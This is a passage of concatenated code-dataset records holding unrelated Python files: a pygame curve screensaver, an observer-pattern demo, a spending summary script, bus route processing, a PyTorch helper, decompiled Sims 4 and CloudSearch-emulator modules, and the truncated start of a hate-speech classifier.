/ count\n        res = []\n        for i in range(count):\n            p = self.get_point(base_points, i * alpha)\n            res.append(p)\n\n        return res
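\n\n    # Worked example (illustrative numbers, not from the original code): for\n    # base points (0, 0), (2, 2), (4, 0) and count=2 (so alpha = 1/2),\n    # get_points returns the start point (0, 0) for i=0 and, for i=1, the\n    # blend 0.5*(4, 0) + 0.25*(2, 2) + 0.25*(0, 0) = (2.5, 0.5).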
\n\n    def set_points(self, speeds):\n        \"\"\"recomputes the coordinates of the support points\"\"\"\n        for p in range(len(self.points)):\n            self.points[p] = Vec2d.__add__(self.points[p], speeds[p])\n            if self.points[p][0] > SCREEN_DIM[0] or self.points[p][0] < 0:\n                speeds[p] = [- speeds[p][0], speeds[p][1]]\n            if self.points[p][1] > SCREEN_DIM[1] or self.points[p][1] < 0:\n                speeds[p] = [speeds[p][0], -speeds[p][1]]\n\n\nclass Knot(Polyline):\n    def __init__(self, points, count):\n        super().__init__(points, count)\n\n    def get_knot(self):\n        if len(self.points) < 3:\n            return []\n        res = []\n        for i in range(-2, len(self.points) - 2):\n            ptn = []\n            ptn.append(Vec2d.__add__(self.points[i], self.points[i + 1]).__mul__(0.5)) # add the midpoint between i and i+1\n            ptn.append(self.points[i + 1])\n            ptn.append(Vec2d.__add__(self.points[i + 1], self.points[i + 2]).__mul__(0.5)) # add the midpoint between i+1 and i+2\n            res.extend(self.get_points(ptn, self.count)) # extend appends the elements of the given iterable\n        return res
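\n\n# Note on get_knot (illustrative): each of the n support points contributes\n# self.count curve points built from a [midpoint, vertex, midpoint] control\n# triple, so n support points yield n * count points of a closed, rounded\n# curve (negative indices make the polyline wrap around).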
\n\n\n# =======================================================================================\n# Drawing functions\n# =======================================================================================\ndef draw_points(points, style=\"points\", width=3, color=(255, 255, 255)):\n    \"\"\"draws the points on the screen\"\"\"\n    if style == \"line\":\n        for p_n in range(-1, len(points) - 1):\n            intp1, intp2 = points[p_n].int_pair(), points[p_n + 1].int_pair()\n            pygame.draw.line(gameDisplay, color,\n                             (intp1[0], intp1[1]),\n                             (intp2[0], intp2[1]), width)\n\n    elif style == \"points\":\n        for p in points:\n            intp = p.int_pair()\n            pygame.draw.circle(gameDisplay, color,\n                               (intp[0], intp[1]), width)\n\ndef draw_help():\n    \"\"\"draws the program's help screen\"\"\"\n    gameDisplay.fill((50, 50, 50))\n    font1 = pygame.font.SysFont(\"courier\", 24)\n    font2 = pygame.font.SysFont(\"serif\", 24)\n    data = []\n    data.append([\"F1\", \"Show Help\"])\n    data.append([\"R\", \"Restart\"])\n    data.append([\"P\", \"Pause/Play\"])\n    data.append([\"Num+\", \"More points\"])\n    data.append([\"Num-\", \"Less points\"])\n    data.append([\"Q\", \"Speed Up\"])\n    data.append([\"W\", \"Speed Down\"])\n    data.append([\"D\", \"Delete last point\"])\n    data.append([\"\", \"\"])\n    data.append([str(steps), \"Current points\"])\n\n    pygame.draw.lines(gameDisplay, (255, 50, 50, 255), True, [\n        (0, 0), (800, 0), (800, 600), (0, 600)], 5)\n    for i, text in enumerate(data):\n        gameDisplay.blit(font1.render(\n            text[0], True, (128, 128, 255)), (100, 100 + 30 * i))\n        gameDisplay.blit(font2.render(\n            text[1], True, (128, 128, 255)), (200, 100 + 30 * i))\n\ndef change_speed(speeds, change):\n    for speed in speeds:\n        speed[0] = 0.1 if speed[0] + change <= 0 else speed[0] + change \n        speed[1] = 0.1 if speed[1] + change <= 0 else speed[1] + change \n\n# =======================================================================================\n# Main program\n# =======================================================================================\nif __name__ == \"__main__\":\n    pygame.init()\n    gameDisplay = pygame.display.set_mode(SCREEN_DIM)\n    pygame.display.set_caption(\"MyScreenSaver\")\n\n    steps = 35\n    working = True\n    points = []\n    speeds = []\n    show_help = False\n    pause = True\n\n    hue = 0\n    color = pygame.Color(0)\n    knt = Knot(points, steps)\n\n    while working:\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                working = False\n            if event.type == pygame.KEYDOWN:\n                if event.key == pygame.K_ESCAPE:\n                    working = False\n                if event.key == pygame.K_r:\n                    points = []\n                    speeds = []\n                if event.key == pygame.K_p:\n                    pause = not pause\n                if event.key == pygame.K_KP_PLUS:\n                    steps += 1\n                if event.key == pygame.K_F1:\n                    show_help = not show_help\n                if event.key == pygame.K_KP_MINUS:\n                    steps -= 1 if steps > 1 else 0\n                if event.key == pygame.K_d:\n                    if points:  # guard against deleting from an empty polyline\n                        points.pop()\n                        speeds.pop()\n                if event.key == pygame.K_q:\n                    change_speed(speeds, 1)\n                if event.key == pygame.K_w:\n                    change_speed(speeds, -1)\n\n            if event.type == pygame.MOUSEBUTTONDOWN:\n                points.append(Vec2d(event.pos))\n                speeds.append([random.random() * 2, random.random() * 2])\n\n        gameDisplay.fill((0, 0, 0))  # background color\n        hue = (hue + 1) % 360\n        color.hsla = (hue, 100, 50, 100) # (hue, saturation, lightness) alpha\n        draw_points(points)\n        knt.points = points\n        draw_points(knt.get_knot(), \"line\", 3, color)\n        if not pause:\n            knt.set_points(speeds)\n        if show_help:\n            draw_help()\n\n        pygame.display.flip()\n\n    pygame.display.quit()\n    pygame.quit()\n    exit(0)\n","sub_path":"Coursera/C2/week2/screen.py","file_name":"screen.py","file_ext":"py","file_size_in_byte":8738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"305887527","text":"\nclass Event(list):\n\tdef __call__(self, *args, **kwargs):\n\t\tfor item in self:\n\t\t\titem(*args, **kwargs)\n\t\t\t\n\t\t\t\nclass PropertyObservable:\n\tdef __init__(self):\n\t\tself.property_changed=Event()\n\t\t\n\nclass Person(PropertyObservable):\n\tdef __init__(self, age=0):\n\t\tsuper().__init__()\n\t\tself._age=age\n\t\t\n\t@property\n\tdef can_vote(self):\n\t\treturn self._age>=18\n\t\t\n\t@property\n\tdef age(self):\n\t\treturn self._age\n\t\t\n\t@age.setter\n\tdef age(self, value):\n\t\tif self._age==value:\n\t\t\treturn\n\t\told_can_vote=self.can_vote\n\t\tself._age=value\n\t\tself.property_changed('age', value)\n\t\t\n\t\tif old_can_vote!=self.can_vote:\n\t\t\tself.property_changed('can_vote', self.can_vote)\n\n\nclass TrafficAuthority:\n\tdef __init__(self, person):\n\t\tself.person=person\n\t\tperson.property_changed.append(self.person_changed)\n\t\t\t\n\tdef person_changed(self, name, value):\n\t\tif name=='age':\n\t\t\tif value<=16:\n\t\t\t\tprint('Sorry, too young to drive.')\n\t\t\telse:\n\t\t\t\tprint('You can drive.')\n\t\t\t\tself.person.property_changed.remove(self.person_changed)\n\t\tif name=='can_vote':\n\t\t\tprint(f'Can vote: {value}')\n\t\t\n\t\t\n#test\np=Person(18)\nta=TrafficAuthority(p)\nfor age in range(14, 20):\n\tprint(f'Setting age to {age}')\n\tp.age=age","sub_path":"Patterns/observer/prop_obs.py","file_name":"prop_obs.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"192739808","text":"#!/usr/bin/env python\n# -*- encoding: utf-8\n\nimport collections\nimport datetime as dt\nimport json\nimport math\nimport os\nimport re\nimport sys\n\n\nROOT = os.path.join(os.environ['HOME'], 'Dropbox', 'spending')\n\nif len(sys.argv) >= 2:\n    DAYS_TO_GET = int(sys.argv[1])\nelse:\n    DAYS_TO_GET = 14\n\n\nif __name__ == '__main__':\n    spending = {\n        (dt.datetime.now() - dt.timedelta(days=x)).date(): []\n        for x in range(DAYS_TO_GET + 1)\n    }\n\n    tagged_spending = collections.Counter()\n\n    for root, _, filenames in os.walk(ROOT):\n\n        # Check we're in a YYYY/MM/DD directory\n        if not re.search(r'\\d{4}/\\d{2}/\\d{2}$', root):\n            continue\n\n        date_string = root[-len('DDDD/DD/DD'):]\n        date = dt.datetime.strptime(date_string, '%Y/%m/%d').date()\n\n        if (dt.datetime.now().date() - date).days > DAYS_TO_GET:\n            continue\n\n        for f in filenames:\n            path = os.path.join(root, f)\n            data = json.load(open(path))\n            spending[date].append(data['amount'])\n
            for t in data['tags']:\n                tagged_spending[t] += data['amount']\n\n\n    print('')\n    print('## Spending by day ##')\n    print('')\n    max_spend = max(sum(v) for v in spending.values())\n    increment = max_spend / 20\n\n    for d, expenses in sorted(spending.items()):\n        total = '%3.2f' % sum(expenses)\n        units = int(math.floor(sum(expenses) / increment))\n        print('%s\\t%s\\t%s' % (\n            d.strftime('%Y-%m-%d'),\n            total.rjust(6),\n            u'█' * units or '▏'))\n\n    print(\n        ' ' * 16 +\n        ('%.2f' % sum(sum(v) for v in spending.values())).rjust(6)\n    )\n\n    print('\\n')\n\n    print('## Spending by tag ##')\n    print('')\n    # Scale the tag bars by the largest tag total rather than the daily maximum\n    max_spend = max(tagged_spending.values()) if tagged_spending else 1\n    increment = max_spend / 20\n\n    for t, value in tagged_spending.most_common(20):\n        total = '%.2f' % value\n        units = int(math.floor(value / increment))\n        print('%s\\t%s\\t%s' % (\n            t.ljust(20),\n            total.rjust(6),\n            u'█' * units or u'▏'))\n","sub_path":"spending-tracker/print_summary.py","file_name":"print_summary.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"42989563","text":"from route_validator import validate_route\n\ndef process_resp(routes, dt, option):    \n    data = {}\n    count_route = 1\n\n    for route in routes:\n        if count_route > 3:\n            break\n        \n        route_key = \"Route_\" + str(count_route)\n        data[route_key] = {}\n        other_transit = False\n\n        count_step = 1\n        steps = route['legs'][0]['steps']\n        bus_journeys = 0\n        valid_routes = 0\n        for step in steps:\n            step_key = \"Step_\" + str(count_step)\n            data[route_key][step_key] = {}\n            try:\n                transit_details = step['transit_details']\n                if transit_details['line']['vehicle']['type'] == 'BUS':\n                    bus_journeys += 1\n                    dep_name = str(transit_details['departure_stop'][\"name\"])\n                    arr_name = str(transit_details['arrival_stop'][\"name\"])\n                    data[route_key][step_key][\"Instructions\"] = step['html_instructions']\n                    data[route_key][step_key][\"Departure Stop\"] = transit_details['departure_stop']\n                    data[route_key][step_key][\"Arrival Stop\"] = transit_details['arrival_stop']\n                    data[route_key][step_key][\"Departure Stop Name\"] = dep_name\n                    data[route_key][step_key][\"Arrival Stop Name\"] = arr_name\n                    data[route_key][step_key][\"Line\"] = transit_details['line']['short_name'].upper()\n                    data[route_key][step_key][\"Num Stops\"] = transit_details['num_stops']\n                    data[route_key][step_key][\"Departure Time\"] = transit_details['departure_time'][\"text\"]\n                    data[route_key][step_key][\"Arrival Time\"] = transit_details['arrival_time'][\"text\"]\n                    route_validation = validate_route(\n                        transit_details['departure_stop'],\n                        transit_details['arrival_stop'],\n                        transit_details['line'][\"short_name\"].upper())\n                    data[route_key][step_key][\"Route Validation\"] = route_validation\n\n                    if route_validation[\"Status code\"] == 0:\n                        valid_routes += 1\n                else:\n                    other_transit = True\n\n            except Exception as e:\n                data[route_key][step_key][\"Instructions\"] = step['html_instructions']    \n            finally:\n                count_step += 1\n\n        data[route_key][\"routable\"] = \"b\" if valid_routes == bus_journeys and bus_journeys != 0 \\\n            and not other_transit else \"w\" if valid_routes > 0 and bus_journeys == 0 and not other_transit \\\n            else \"n\"\n        \n        data[route_key][\"schedule\"] = {\"datetime\": dt, \"option\": option}\n        \n        count_route += 1\n\n    return data","sub_path":"Dublink-Bus-master/app/dir_api_resp.py","file_name":"dir_api_resp.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"292377791","text":"from typing import Dict, Union\n\nimport torch\nfrom torch.autograd import Variable\nimport numpy\n\n\ndef arrays_to_variables(data_structure: Dict[str, Union[dict, numpy.ndarray]],\n                        cuda_device: int = -1):\n    \"\"\"\n    Convert an (optionally) nested dictionary of arrays to Pytorch ``Variables``,\n    suitable for use in a computation graph.\n    \"\"\"\n    if isinstance(data_structure, dict):\n        for key, value in data_structure.items():\n            data_structure[key] = arrays_to_variables(value, cuda_device)  # propagate cuda_device through the recursion\n        return data_structure\n    else:\n        torch_variable = Variable(torch.from_numpy(data_structure))\n        if cuda_device == -1:\n            return torch_variable\n        else:\n            return torch_variable.cuda(cuda_device)\n","sub_path":"allennlp/common/tensor.py","file_name":"tensor.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"517821789","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]\n# Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\objects\\mixins.py\n# Compiled at: 2020-10-09 22:38:14\n# Size of source mod 2**32: 18034 bytes\nfrom _collections import defaultdict\nfrom collections import namedtuple\nimport weakref\nfrom interactions import ParticipantType\nfrom interactions.utils.tunable_provided_affordances import TunableProvidedAffordances\nfrom sims4.tuning.tunable import TunableReference, TunableSet, TunableMapping\nfrom sims4.utils import flexmethod\nfrom singletons import EMPTY_SET\nimport clock, services, sims4.log\nlogger = sims4.log.Logger('InUse')\n\nclass _CraftingLockoutData:\n\n    def __init__(self):\n        self._crafting_lockout_ref_counts = {}\n\n    def add_lockout(self, crafting_type):\n        if self._crafting_lockout_ref_counts.get(crafting_type):\n            self._crafting_lockout_ref_counts[crafting_type] += 1\n        else:\n            self._crafting_lockout_ref_counts[crafting_type] = 1\n\n    def get_ref_count(self, crafting_type, from_autonomy=False):\n        ref_count = self._crafting_lockout_ref_counts.get(crafting_type)\n        if ref_count:\n            return ref_count\n        return 0\n\n\nclass LockoutMixin:\n\n    def __init__(self, *args, **kwargs):\n        (super().__init__)(*args, **kwargs)\n        self._lockouts = weakref.WeakKeyDictionary()\n        self._crafting_lockouts = weakref.WeakKeyDictionary()\n\n    def add_lockout(self, obj, duration_in_sim_minutes):\n        if self is obj:\n            return\n        else:\n            interval = clock.interval_in_sim_minutes(duration_in_sim_minutes)\n            end_time = services.time_service().sim_now + interval\n            lockout = self._lockouts.get(obj, None)\n            if lockout is None or lockout < end_time:\n                self._lockouts[obj] = end_time\n            crafting_lockout = self._crafting_lockouts.get(obj, None)\n            if crafting_lockout is None:\n                crafting_lockout_data = None\n                for super_affordance in obj.super_affordances():\n                    if hasattr(super_affordance, 'crafting_type_requirement'):\n                        if super_affordance.crafting_type_requirement is not None:\n                            if crafting_lockout_data is None:\n                                crafting_lockout_data = _CraftingLockoutData()\n                            crafting_lockout_data.add_lockout(super_affordance.crafting_type_requirement)\n\n                if crafting_lockout_data is not None:\n                    self._crafting_lockouts[obj] = crafting_lockout_data\n\n    def clear_all_lockouts(self):\n        self._lockouts = weakref.WeakKeyDictionary()\n        self._crafting_lockouts = weakref.WeakKeyDictionary()\n\n    def has_lockout(self, obj):\n        lockout = self._lockouts.get(obj, None)\n        if lockout:\n            if lockout < 
services.time_service().sim_now:\n del self._lockouts[obj]\n if obj in self._crafting_lockouts:\n del self._crafting_lockouts[obj]\n return False\n return True\n return False\n\n def get_lockouts_gen(self):\n current_time = services.time_service().sim_now\n for obj in self._lockouts:\n lockout = self._lockouts.get(obj, None)\n if lockout >= current_time:\n yield (\n obj, lockout - current_time)\n\n def get_autonomous_crafting_lockout_ref_count(self, crafting_type):\n ref_count = 0\n for crafting_lockout_data in self._crafting_lockouts.values():\n ref_count += crafting_lockout_data.get_ref_count(crafting_type)\n\n return ref_count\n\n\nclass InUseError(Exception):\n\n def __init__(self, obj):\n self.obj = obj\n\n def __str__(self):\n return 'Attempt to reserve an unavailable object - ' + str(self.obj)\n\n\nclass NotInUseError(Exception):\n\n def __init__(self, obj):\n self.obj = obj\n\n def __str__(self):\n return 'Attempt to release an object that is already free - ' + str(self.obj)\n\n\nProvidedAffordanceData = namedtuple('ProvidedAffordanceData', ('affordance', 'object_filter',\n 'allow_self'))\nInventoryProvidedAfforanceData = namedtuple('InventoryProvidedAffordanceData', ('affordance',\n 'object_filter',\n 'allow_self',\n 'provider_id'))\n\nclass AffordanceCacheMixin:\n __slots__ = ()\n\n def __init__(self, *args, **kwargs):\n (super().__init__)(*args, **kwargs)\n self._super_affordances_cache = None\n self._target_provided_affordances_cache = None\n self._actor_mixers_cache = None\n self._provided_mixers_cache = None\n\n def add_to_affordance_caches(self, super_affordances, target_provided_affordances):\n if super_affordances:\n if self._super_affordances_cache is None:\n self._super_affordances_cache = set()\n self._super_affordances_cache.update(super_affordances)\n if target_provided_affordances:\n if self._target_provided_affordances_cache is None:\n self._target_provided_affordances_cache = []\n for provided_affordance_data in target_provided_affordances:\n self._target_provided_affordances_cache.append(provided_affordance_data)\n\n def add_to_actor_mixer_cache(self, actor_mixers):\n if actor_mixers:\n if self._actor_mixers_cache is None:\n self._actor_mixers_cache = defaultdict(set)\n for super_affordance, mixer_affordances in actor_mixers.items():\n self._actor_mixers_cache[super_affordance].update(mixer_affordances)\n\n def add_to_provided_mixer_cache(self, provided_mixers):\n if provided_mixers:\n if self._provided_mixers_cache is None:\n self._provided_mixers_cache = defaultdict(set)\n for super_affordance, mixer_affordances in provided_mixers.items():\n self._provided_mixers_cache[super_affordance].update(mixer_affordances)\n\n def get_provided_super_affordances(self):\n return (None, None)\n\n def get_actor_and_provided_mixers_list(self):\n return (None, None)\n\n def get_sim_info_from_provider(self):\n raise NotImplementedError\n\n def update_affordance_caches(self):\n self._super_affordances_cache = None\n self._target_provided_affordances_cache = None\n self._actor_mixers_cache = None\n self._provided_mixers_cache = None\n super_affordances, target_provided_affordances = self.get_provided_super_affordances()\n self.add_to_affordance_caches(super_affordances, target_provided_affordances)\n list_actor_mixers, list_provided_mixers = self.get_actor_and_provided_mixers_list()\n if list_actor_mixers is not None:\n for actor_mixers in list_actor_mixers:\n self.add_to_actor_mixer_cache(actor_mixers)\n\n if list_provided_mixers is not None:\n for provided_mixers in 
list_provided_mixers:\n self.add_to_provided_mixer_cache(provided_mixers)\n\n def get_cached_super_affordances_gen(self):\n if self._super_affordances_cache is not None:\n yield from self._super_affordances_cache\n if False:\n yield None\n\n def get_cached_target_super_affordances_gen(self, context, target):\n sim_info = self.get_sim_info_from_provider()\n affordances_to_skip = set()\n if self._target_provided_affordances_cache is not None:\n for provided_affordance_data in self._target_provided_affordances_cache:\n if provided_affordance_data.object_filter is None and provided_affordance_data.allow_self is None:\n yield provided_affordance_data.affordance\n else:\n if target.is_sim:\n if target.sim_info is sim_info:\n if not provided_affordance_data.allow_self:\n continue\n if provided_affordance_data.affordance in affordances_to_skip:\n continue\n if not provided_affordance_data.object_filter.is_object_valid(target, sim=(context.sim)):\n continue\n if not provided_affordance_data.affordance.test_affordance_filters(context.sim, target):\n continue\n affordances_to_skip.add(provided_affordance_data.affordance)\n yield (\n provided_affordance_data.affordance, provided_affordance_data)\n\n def get_cached_target_provided_affordances_data_gen(self):\n if self._target_provided_affordances_cache is not None:\n yield from self._target_provided_affordances_cache\n if False:\n yield None\n\n def get_cached_actor_mixers(self, super_interaction):\n if self._actor_mixers_cache is not None:\n if super_interaction in self._actor_mixers_cache:\n return self._actor_mixers_cache[super_interaction]\n return EMPTY_SET\n return EMPTY_SET\n\n def get_cached_provided_mixers_gen(self, super_interaction):\n if self._provided_mixers_cache is not None:\n yield from self._provided_mixers_cache.get(super_interaction, ())\n if False:\n yield None\n\n\nclass SuperAffordanceProviderMixin:\n INSTANCE_TUNABLES = {'super_affordances': TunableSet(description='\\n Super affordances this adds to the object.\\n ',\n tunable=TunableReference(description='\\n A super affordance added to this object.\\n ',\n manager=(services.get_instance_manager(sims4.resources.Types.INTERACTION)),\n class_restrictions=('SuperInteraction', ),\n pack_safe=True))}\n FACTORY_TUNABLES = INSTANCE_TUNABLES\n\n @classmethod\n def get_provided_super_affordances_gen(cls):\n yield from cls.super_affordances\n if False:\n yield None\n\n\nclass TargetSuperAffordanceProviderMixin:\n INSTANCE_TUNABLES = {'target_super_affordances': TunableProvidedAffordances(description='\\n Super affordances this adds to the target.\\n ',\n locked_args={'target':ParticipantType.Object, \n 'carry_target':ParticipantType.Invalid, \n 'is_linked':False, \n 'unlink_if_running':False})}\n FACTORY_TUNABLES = INSTANCE_TUNABLES\n\n\nclass MixerProviderMixin:\n INSTANCE_TUNABLES = {'provided_mixers': TunableMapping(description='\\n Mixers this adds to an associated target object.\\n ',\n key_type=TunableReference(description='\\n The super affordance these mixers are associated with.\\n ',\n manager=(services.get_instance_manager(sims4.resources.Types.INTERACTION)),\n class_restrictions=('SuperInteraction', ),\n pack_safe=True),\n value_type=TunableSet(description='\\n Set of mixer affordances associated with the super affordance.\\n ',\n tunable=TunableReference(manager=(services.get_instance_manager(sims4.resources.Types.INTERACTION)),\n category='asm',\n description='Linked Affordance',\n class_restrictions=('MixerInteraction', ),\n pack_safe=True)))}\n\n @flexmethod\n def 
get_mixers(cls, inst, super_interaction):\n inst_or_cls = inst if inst is not None else cls\n mixers = inst_or_cls.provided_mixers.get(super_interaction, [])\n return mixers\n\n\nclass MixerActorMixin:\n INSTANCE_TUNABLES = {'actor_mixers': TunableMapping(description='\\n Mixers this adds to an associated actor object. (When targeting\\n something else.)\\n ',\n key_type=TunableReference(description='\\n The super affordance these mixers are associated with.\\n ',\n manager=(services.get_instance_manager(sims4.resources.Types.INTERACTION)),\n class_restrictions=('SuperInteraction', ),\n pack_safe=True),\n value_type=TunableSet(description='\\n Set of mixer affordances associated with the super affordance.\\n ',\n tunable=TunableReference(description='\\n Linked mixer affordance.\\n ',\n manager=(services.get_instance_manager(sims4.resources.Types.INTERACTION)),\n category='asm',\n class_restrictions=('MixerInteraction', ),\n pack_safe=True)))}\n\n @flexmethod\n def get_actor_mixers(cls, inst, super_interaction):\n inst_or_cls = inst if inst is not None else cls\n mixers = inst_or_cls.actor_mixers.get(super_interaction, [])\n return mixers","sub_path":"Scripts/simulation/objects/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":13558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"585089816","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/vagrant/src/nozama-cloudsearch/nozama-cloudsearch-data/nozama/cloudsearch/data/document.py\n# Compiled at: 2013-12-03 06:00:21\n\"\"\"\n\"\"\"\nimport os, logging\nfrom pyelasticsearch import ElasticHttpNotFoundError\nfrom nozama.cloudsearch.data.db import db\nfrom nozama.cloudsearch.data.db import get_es\n\ndef get_log(e=None):\n return logging.getLogger(('{0}.{1}').format(__name__, e) if e else __name__)\n\n\ndef all():\n \"\"\"Return all the stored documents.\n \"\"\"\n log = get_log('all')\n conn = db().conn()\n returned = list(conn.documents.find())\n log.debug((\"Returning '{0}' documents\").format(len(returned)))\n return returned\n\n\ndef removed():\n \"\"\"Return all the documents which have been removed.\n \"\"\"\n log = get_log('removed')\n conn = db().conn()\n returned = list(conn.documents_removed.find())\n log.debug((\"Returning '{0}' documents\").format(len(returned)))\n return returned\n\n\nimport formencode\nfrom formencode import validators\n\nclass FieldsSchema(formencode.Schema):\n \"\"\"The data to be searched. 
I think anything goes here.\n \"\"\"\n allow_extra_fields = True\n\n\nclass DocSchema(formencode.Schema):\n \"\"\"Validate the document and the add/remove operation.\n\n \"\"\"\n allow_extra_fields = True\n id = validators.String(not_empty=True, strip=True)\n lang = validators.String(not_empty=True, strip=True, if_missing='en')\n version = validators.String(not_empty=True, strip=True)\n type = validators.OneOf([\n 'add', 'delete'], not_empty=True, strip=True)\n\n\nDOC_SCHEMA = DocSchema()\nHEADERS = {'Content-Type': 'application/json'}\n\ndef add_to_elasticsearch(doc):\n \"\"\"This indexes the fields and puts them into cloud search for later\n searching.\n\n \"\"\"\n log = get_log('add_to_elasticsearch')\n es = get_es()\n log.debug(('adding doc <{0}>').format(doc['id']))\n result = es.conn.index(es.index, es.doc_type, doc['fields'], id=doc['_id'])\n es.conn.refresh(es.index)\n log.debug(('doc <{0}> add result: {1}').format(doc['id'], result))\n\n\ndef remove_from_elasticsearch(doc):\n \"\"\"Remove this document from the index.\n\n \"\"\"\n log = get_log('remove_from_elasticsearch')\n es = get_es()\n log.debug(('remove doc <{0}>').format(doc['id']))\n result = es.conn.delete(es.index, es.doc_type, id=doc['_id'])\n es.conn.refresh(es.index)\n log.debug(('doc <{0}> remove result: {1}').format(doc['id'], result))\n\n\ndef search(query={}):\n \"\"\"Perform a search across text fields.\n\n :returns: A dict compatible with an Amazon CloudSearch response.\n\n \"\"\"\n log = get_log('search')\n es = get_es()\n qstring = query.get('q', '')\n log.debug((\"searching query '{0}'\").format(query))\n try:\n if qstring:\n query = {'query': {'query_string': {'query': ('{0}*').format(qstring)}}}\n results = es.conn.search(query, index=es.index)\n else:\n query = {'query': {'match_all': {}}}\n results = es.conn.search(query, index=es.index)\n except ElasticHttpNotFoundError:\n results = dict(hits=dict(hits=[], total=0), took=0)\n\n rc = {'rank': '-text_relevance', \n 'match-expr': (\"(label '{0}')\").format(qstring), \n 'hits': {'found': results['hits']['total'], \n 'start': 0, \n 'hit': [ {'id': i['_id']} for i in results['hits']['hits'] ]}, \n 'info': {'rid': os.urandom(40).encode('hex'), \n 'time-ms': results['took'], \n 'cpu-time-ms': 0}}\n log.debug((\"found '{0}'\").format(rc))\n return rc\n\n\ndef load(docs_to_load):\n \"\"\"Load documents in the Amazon SDF an add/remove from mongo accordingly.\n\n Each document will be validated against DocSchema.\n\n :returns: An amazon compatible documents/batch Response Property dict.\n\n For example:\n\n .. 
code-block:: python\n\n rc = dict(\n status='ok',\n adds=len(to_load),\n deletes=len(to_remove),\n error='',\n warning='',\n )\n\n Reference:\n * http://docs.aws.amazon.com/cloudsearch/latest/developerguide/ DocumentsBatch.JSON.html#DocumentsBatch.JSON.ResponseProperties\n\n \"\"\"\n log = get_log('load')\n conn = db().conn()\n to_load = []\n to_remove = []\n for doc in docs_to_load:\n doc = DOC_SCHEMA.to_python(doc)\n if doc['type'] == 'add':\n doc['_id'] = doc['id']\n doc.pop('type')\n log.debug(('to_load: {0}').format(doc))\n to_load.append(doc)\n else:\n log.debug((\"to remove: '{0}'\").format(doc))\n to_remove.append(doc)\n\n if to_load:\n log.debug((\"bulk loading: '{0}' document(s)\").format(len(to_load)))\n conn.documents.insert(to_load)\n for doc in to_load:\n add_to_elasticsearch(doc)\n\n if to_remove:\n doc_ids = [ doc['id'] for doc in to_remove ]\n for doc_id in doc_ids:\n query = dict(_id=doc_id)\n found = conn.documents.find_one(query)\n if found:\n log.debug((\"adding to remove store: '{0}'\").format(query))\n conn.documents_removed.insert(found)\n conn.documents.remove(query)\n\n rc = dict(status='ok', adds=len(to_load), deletes=len(to_remove), error='', warning='')\n return rc\n\n\ndef configure_field(domain, name, field_type):\n \"\"\"Set up the full text indexing and how the type information is handled.\n\n :param domain: Not used for now, possibly with be to collection or db.\n\n :param name: The field inside the batch upload to set the index for.\n\n :param field_type: The type information. Only 'text' is implemented.\n\n I'm going to make it compatible with how Amazon does it. Although for now\n I'm just going to get FTI working using what MongoDB provides.\n\n \"\"\"\n log = get_log('configure_field')\n field_type = field_type.strip().lower()\n log.debug(('domain <{0}> name<{1}> field_type<{2}>').format(domain, name, field_type))\n\n\ndef report():\n \"\"\"Return a list of a documents added and removed by batch uploading.\n\n :returns: a dict.\n\n E.g.:\n\n {\n \"documents\": [\n # A list of documents currently stored from all batch upload\n # so far.\n :\n ],\n \"documents_removed\": [\n # A list of documents that have been removed from all batch\n # uploads so far.\n :\n ]\n }\n\n \"\"\"\n return {'documents': all(), 'documents_removed': removed()}\n\n\ndef remove_all():\n \"\"\"Remove all store documents.\n \"\"\"\n log = get_log('remove_all')\n conn = db().conn()\n conn.documents.drop()\n conn.documents_removed.drop()\n log.warn('all documents have been removed.')\n get_es().hard_reset()\n log.warn('All indexes removed from elasticsearch.')","sub_path":"pycfiles/nozama_cloudsearch_data-1.1.3-py2.7/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":6964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"620122484","text":"# Based on https://github.com/ybalcanci/Hate-Speech-Detector\nimport warnings\n\nfrom keras import utils\nfrom sklearn.preprocessing import LabelEncoder\n\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nimport numpy as np\nimport pickle\n\n#stderr = sys.stderr\n#sys.stderr = open(os.devnull, 'w')\nfrom tensorflow import keras\nfrom df.loader import load_english_test\nfrom preprocessing.pl.text_preprocessing import TextPreprocessor\n\n\n#load model\nmodel = keras.models.load_model(r\"..\\..\\model\\en\\rnn_model2\")\n\ndf = load_english_test()\n\nTextPreprocessor().clean_data_frame(df)\n\ntest_posts = df['tweet'][0:]\n\nwith 
